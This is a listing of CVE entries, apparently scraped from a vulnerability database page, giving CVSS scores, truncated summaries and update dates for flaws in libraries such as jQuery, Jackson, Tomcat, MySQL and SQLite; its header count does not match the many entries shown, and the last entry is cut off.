Max CVSS: 9.3 | Min CVSS: 1.2 | Total Count: 2

ID CVSS
Summary
Last (major) update Published
CVE-2019-11358 4.3
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the n
16-02-2024 - 16:32 20-04-2019 - 00:29
CVE-2019-10744 6.4
Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.
21-01-2024 - 02:45 26-07-2019 - 00:15
CVE-2019-17566 5.0
Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make
07-01-2024 - 11:15 12-11-2020 - 18:15
CVE-2019-3773 7.5
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources.
27-12-2023 - 15:15 18-01-2019 - 22:29
CVE-2019-13990 7.5
initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.
22-12-2023 - 16:35 26-07-2019 - 19:15
CVE-2020-11080 5.0
In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings e
16-10-2023 - 18:15 03-06-2020 - 23:15
CVE-2012-2098 5.0
Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with ma
14-09-2023 - 00:15 29-06-2012 - 19:55
CVE-2020-9548 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
13-09-2023 - 14:57 02-03-2020 - 04:15
CVE-2020-9547 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
13-09-2023 - 14:57 02-03-2020 - 04:15
CVE-2020-24616 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
13-09-2023 - 14:56 25-08-2020 - 18:15
CVE-2020-10673 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).
13-09-2023 - 14:56 18-03-2020 - 22:15
CVE-2020-24750 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
13-09-2023 - 14:56 17-09-2020 - 19:15
CVE-2020-11023 4.3
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may ex
31-08-2023 - 03:15 29-04-2020 - 21:15
CVE-2020-11022 4.3
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This prob
31-08-2023 - 03:15 29-04-2020 - 22:15
CVE-2019-12402 5.0
The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names insi
18-08-2023 - 14:15 30-08-2019 - 09:15
CVE-2019-20907 5.0
In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
24-05-2023 - 21:15 13-07-2020 - 13:15
CVE-2020-14422 4.3
Lib/ipaddress.py in Python through 3.8.3 improperly computes hash values in the IPv4Interface and IPv6Interface classes, which might allow a remote attacker to cause a denial of service if an application is affected by the performance of a dictionary
16-05-2023 - 02:15 18-06-2020 - 14:15
CVE-2020-17521 2.1
Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operatin
14-04-2023 - 18:32 07-12-2020 - 20:15
CVE-2020-5421 3.6
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jses
01-03-2023 - 18:56 19-09-2020 - 04:15
CVE-2015-4000 4.3
The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a Clie
09-02-2023 - 16:15 21-05-2015 - 00:59
CVE-2020-8287 6.4
Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This c
03-02-2023 - 19:12 06-01-2021 - 21:15
CVE-2021-2007 4.3
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with ne
08-12-2022 - 03:04 20-01-2021 - 15:15
CVE-2019-0230 7.5
Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
02-12-2022 - 19:47 14-09-2020 - 17:15
CVE-2020-1968 4.3
The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the atta
21-11-2022 - 19:48 09-09-2020 - 14:15
CVE-2018-1285 7.5
Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.
27-10-2022 - 20:05 11-05-2020 - 17:15
CVE-2020-2555 7.5
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows una
25-10-2022 - 17:58 15-01-2020 - 17:15
CVE-2020-25866 5.0
In Wireshark 3.2.0 to 3.2.6 and 3.0.0 to 3.0.13, the BLIP protocol dissector has a NULL pointer dereference because a buffer was sized for compressed (not uncompressed) messages. This was addressed in epan/dissectors/packet-blip.c by allowing reasona
07-10-2022 - 15:19 06-10-2020 - 15:15
CVE-2019-11135 2.1
TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
07-10-2022 - 15:03 14-11-2019 - 19:15
CVE-2019-17359 5.0
The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64.
07-10-2022 - 14:50 08-10-2019 - 14:15
CVE-2019-17563 5.1
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be p
07-10-2022 - 13:39 23-12-2019 - 17:15
CVE-2020-24584 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.
07-10-2022 - 13:20 01-09-2020 - 13:15
CVE-2020-24583 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading file
07-10-2022 - 13:14 01-09-2020 - 13:15
CVE-2020-9490 5.0
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via
07-10-2022 - 12:58 07-08-2020 - 16:15
CVE-2020-11973 7.5
Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.
05-10-2022 - 20:53 14-05-2020 - 17:15
CVE-2019-10173 7.5
It was found that xstream API version 1.4.10 before 1.4.11 introduced a regression for a previous deserialization flaw. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshall
05-10-2022 - 20:38 23-07-2019 - 13:15
CVE-2020-9281 4.3
A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).
12-09-2022 - 13:51 07-03-2020 - 01:15
CVE-2020-10725 4.0
A flaw was found in DPDK version 19.11 and above that allows a malicious guest to cause a segmentation fault of the vhost-user backend application running on the host, which could result in a loss of connectivity for the other guests running on that
02-09-2022 - 15:36 20-05-2020 - 14:15
CVE-2020-10723 4.6
A memory corruption issue was found in DPDK versions 17.05 and above. This flaw is caused by an integer truncation on the index of a payload. Under certain circumstances, the index (a UInt) is copied and truncated into a uint16, which can lead to out
02-09-2022 - 15:36 19-05-2020 - 19:15
CVE-2020-10722 4.6
A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption.
02-09-2022 - 15:36 19-05-2020 - 19:15
CVE-2020-10726 2.1
A vulnerability was found in DPDK versions 19.11 and above. A malicious container that has direct access to the vhost-user socket can keep sending VHOST_USER_GET_INFLIGHT_FD messages, causing a resource leak (file descriptors and virtual memory), whi
02-09-2022 - 15:34 20-05-2020 - 14:15
CVE-2020-13254 4.3
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.
02-09-2022 - 15:33 03-06-2020 - 14:15
CVE-2019-20892 4.0
net-snmp before 5.8.1.pre1 has a double free in usm_free_usmStateReference in snmplib/snmpusm.c via an SNMPv3 GetBulk request. NOTE: this affects net-snmp packages shipped to end users by multiple Linux distributions, but might not affect an upstream
02-09-2022 - 15:31 25-06-2020 - 10:15
CVE-2020-17498 4.3
In Wireshark 3.2.0 to 3.2.5, the Kafka protocol dissector could crash. This was addressed in epan/dissectors/packet-kafka.c by avoiding a double free during LZ4 decompression.
02-09-2022 - 15:31 13-08-2020 - 16:15
CVE-2020-13596 4.3
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.
02-09-2022 - 15:31 03-06-2020 - 14:15
CVE-2020-15025 4.0
ntpd in ntp 4.2.8 before 4.2.8p15 and 4.3.x before 4.3.101 allows remote attackers to cause a denial of service (memory consumption) by sending packets, because memory is not freed in situations where a CMAC key is used and associated with a CMAC alg
02-09-2022 - 15:31 24-06-2020 - 19:15
CVE-2019-17569 5.8
The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of H
02-09-2022 - 15:30 24-02-2020 - 22:15
CVE-2020-25020 7.5
MPXJ through 8.1.3 allows XXE attacks. This affects the GanttProjectReader and PhoenixReader components.
02-09-2022 - 15:29 29-08-2020 - 19:15
CVE-2021-2032 4.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.7.32 and prior and 8.0.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network ac
29-08-2022 - 20:52 20-01-2021 - 15:15
CVE-2020-1971 4.3
The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they
29-08-2022 - 20:27 08-12-2020 - 16:15
CVE-2020-7064 5.8
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead
29-08-2022 - 20:04 01-04-2020 - 04:15
CVE-2019-1559 4.3
If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid
19-08-2022 - 11:14 27-02-2019 - 23:29
CVE-2018-0732 5.0
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime result
16-08-2022 - 13:00 12-06-2018 - 13:29
CVE-2019-9511 7.8
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. T
12-08-2022 - 18:43 13-08-2019 - 21:15
CVE-2019-9513 7.8
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the
12-08-2022 - 18:41 13-08-2019 - 21:15
CVE-2020-10531 6.8
An issue was discovered in International Components for Unicode (ICU) for C/C++ through 66.1. An integer overflow, leading to a heap-based buffer overflow, exists in the UnicodeString::doAppend() function in common/unistr.cpp.
12-08-2022 - 18:28 12-03-2020 - 19:15
CVE-2020-35460 5.0
common/InputStreamHelper.java in Packwood MPXJ before 8.3.5 allows directory traversal in the zip stream handler flow, leading to the writing of files to arbitrary locations.
06-08-2022 - 03:53 14-12-2020 - 23:15
CVE-2018-8032 4.3
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
25-07-2022 - 18:15 02-08-2018 - 13:29
CVE-2020-5398 7.6
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response
25-07-2022 - 18:15 17-01-2020 - 00:15
CVE-2020-9484 4.4
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the Persiste
25-07-2022 - 18:15 20-05-2020 - 19:15
CVE-2019-10086 7.5
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by defa
25-07-2022 - 18:15 20-08-2019 - 21:15
CVE-2020-10683 7.5
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any a
25-07-2022 - 18:15 01-05-2020 - 19:15
CVE-2016-1000031 7.5
Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution
25-07-2022 - 18:15 25-10-2016 - 14:29
CVE-2019-0227 5.4
A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits continue in the project's Axis 1.x Subversion repository, legacy users are encouraged to buil
25-07-2022 - 18:15 01-05-2019 - 21:29
CVE-2015-8965 7.5
Rogue Wave JViews before 8.8 patch 21 and 8.9 before patch 1 allows remote attackers to execute arbitrary Java code that exists in the classpath, such as test code or administration code. The issue exists because the ilog.views.faces.IlvFacesControll
23-07-2022 - 10:33 06-04-2017 - 21:59
CVE-2021-2011 7.1
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via m
18-07-2022 - 18:47 20-01-2021 - 15:15
CVE-2021-2022 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with n
13-07-2022 - 14:09 20-01-2021 - 15:15
CVE-2020-1938 7.5
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available t
12-07-2022 - 17:42 24-02-2020 - 22:15
CVE-2021-2119 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
30-06-2022 - 19:06 20-01-2021 - 15:15
CVE-2018-10237 4.3
Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray
29-06-2022 - 19:15 26-04-2018 - 21:29
CVE-2019-14862 4.3
There is a vulnerability in knockout before version 3.5.0-beta, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.
07-06-2022 - 18:41 02-01-2020 - 15:15
CVE-2019-12399 5.0
When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring
07-06-2022 - 18:41 14-01-2020 - 15:15
CVE-2019-17195 6.8
Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.
07-06-2022 - 18:40 15-10-2019 - 14:15
CVE-2020-17530 7.5
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
03-06-2022 - 16:38 11-12-2020 - 02:15
CVE-2020-13871 5.0
SQLite 3.32.2 has a use-after-free in resetAccumulator in select.c because the parse tree rewrite for window functions is too late.
13-05-2022 - 20:57 06-06-2020 - 16:15
CVE-2018-15756 5.0
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler,
13-05-2022 - 20:56 18-10-2018 - 22:29
CVE-2020-8172 5.8
TLS session reuse can lead to host certificate verification bypass in node version < 12.18.0 and < 14.4.0.
12-05-2022 - 15:01 08-06-2020 - 14:15
CVE-2020-8174 9.3
napi_get_value_string_*() allows various kinds of memory corruption in node < 10.21.0, 12.18.0, and < 14.4.0.
12-05-2022 - 15:01 24-07-2020 - 22:15
CVE-2020-15358 2.1
In SQLite before 3.32.3, select.c mishandles query-flattener optimization, leading to a multiSelectOrderBy heap overflow because of misuse of transitive properties for constant propagation.
12-05-2022 - 15:01 27-06-2020 - 12:15
CVE-2020-13935 5.0
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with inv
12-05-2022 - 15:01 14-07-2020 - 15:15
CVE-2020-9488 4.3
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Lo
12-05-2022 - 15:00 27-04-2020 - 16:15
CVE-2020-12723 5.0
regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.
12-05-2022 - 15:00 05-06-2020 - 15:15
CVE-2020-11971 5.0
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
12-05-2022 - 15:00 14-05-2020 - 17:15
CVE-2020-10543 6.4
Perl before 5.30.3 on 32-bit platforms allows a heap-based buffer overflow because nested regular expression quantifiers have an integer overflow.
12-05-2022 - 15:00 05-06-2020 - 14:15
CVE-2020-10878 7.5
Perl before 5.30.3 has an integer overflow related to mishandling of a "PL_regkind[OP(n)] == NOTHING" situation. A crafted regular expression could lead to malformed bytecode with a possibility of instruction injection.
12-05-2022 - 15:00 05-06-2020 - 14:15
CVE-2020-13954 4.3
By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to
12-05-2022 - 14:47 12-11-2020 - 13:15
CVE-2020-11979 5.0
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without
12-05-2022 - 14:43 01-10-2020 - 20:15
CVE-2020-8277 5.0
A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a larger number
10-05-2022 - 15:25 19-11-2020 - 01:15
CVE-2020-11612 5.0
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free m
26-04-2022 - 17:05 07-04-2020 - 18:15
CVE-2019-10247 5.0
In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured fully qualified directory base resource location on the output of the 4
22-04-2022 - 20:09 22-04-2019 - 20:29
CVE-2019-5427 5.0
c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.
22-04-2022 - 19:28 22-04-2019 - 21:29
CVE-2019-1551 5.0
There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this d
19-04-2022 - 15:36 06-12-2019 - 18:15
CVE-2019-0233 5.0
An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.
18-04-2022 - 15:23 14-09-2020 - 17:15
CVE-2018-1258 6.5
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted
11-04-2022 - 17:18 11-05-2018 - 20:29
CVE-2019-12415 2.1
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML E
08-04-2022 - 13:30 23-10-2019 - 20:15
CVE-2020-11656 7.5
In SQLite through 3.31.1, the ALTER TABLE implementation has a use-after-free, as demonstrated by an ORDER BY clause that belongs to a compound SELECT statement.
08-04-2022 - 10:34 09-04-2020 - 03:15
CVE-2020-11655 5.0
SQLite through 3.31.1 allows attackers to cause a denial of service (segmentation fault) via a malformed window-function query because the AggInfo object's initialization is mishandled.
08-04-2022 - 10:34 09-04-2020 - 03:15
CVE-2020-9327 5.0
In SQLite 3.31.1, isAuxiliaryVtabOperator allows attackers to trigger a NULL pointer dereference and segmentation fault because of generated column optimizations.
08-04-2022 - 10:33 21-02-2020 - 22:15
CVE-2019-17091 4.3
faces/context/PartialViewContextImpl.java in Eclipse Mojarra, as used in Mojarra for Eclipse EE4J before 2.3.10 and Mojarra JavaServer Faces before 2.2.20, allows Reflected XSS because a client window field is mishandled.
06-04-2022 - 18:00 02-10-2019 - 14:15
CVE-2020-8265 6.8
Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 are vulnerable to a use-after-free bug in its TLS implementation. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap
06-04-2022 - 16:26 06-01-2021 - 21:15
CVE-2017-5645 7.5
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
04-04-2022 - 16:53 17-04-2017 - 21:59
CVE-2020-1945 3.3
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files fr
04-04-2022 - 13:31 14-05-2020 - 16:15
CVE-2020-11994 5.0
Server-Side Template Injection and arbitrary file disclosure on Camel templating components
01-04-2022 - 15:33 08-07-2020 - 16:15
CVE-2021-2010 4.9
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with net
30-03-2022 - 19:22 20-01-2021 - 15:15
CVE-2021-2006 6.3
Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 8.0.19 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to c
30-03-2022 - 19:20 20-01-2021 - 15:15
CVE-2021-1998 5.5
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
30-03-2022 - 19:18 20-01-2021 - 15:15
CVE-2020-14756 7.5
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unaut
29-03-2022 - 16:40 20-01-2021 - 15:15
CVE-2020-13934 5.0
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException co
01-03-2022 - 21:01 14-07-2020 - 15:15
CVE-2020-27216 4.4
In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system's temporary directory is shared between all users on that system. A collocated user can obser
01-03-2022 - 20:35 23-10-2020 - 13:15
CVE-2021-2001 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.50 and prior, 5.7.30 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attack
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2009 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multip
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2002 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple p
04-01-2022 - 17:45 20-01-2021 - 15:15
CVE-2021-2058 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple proto
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2042 2.1
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Se
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2056 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protoco
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2055 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2046 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2048 7.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to
04-01-2022 - 17:28 20-01-2021 - 15:15
CVE-2021-2030 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2012 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via m
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2038 6.3
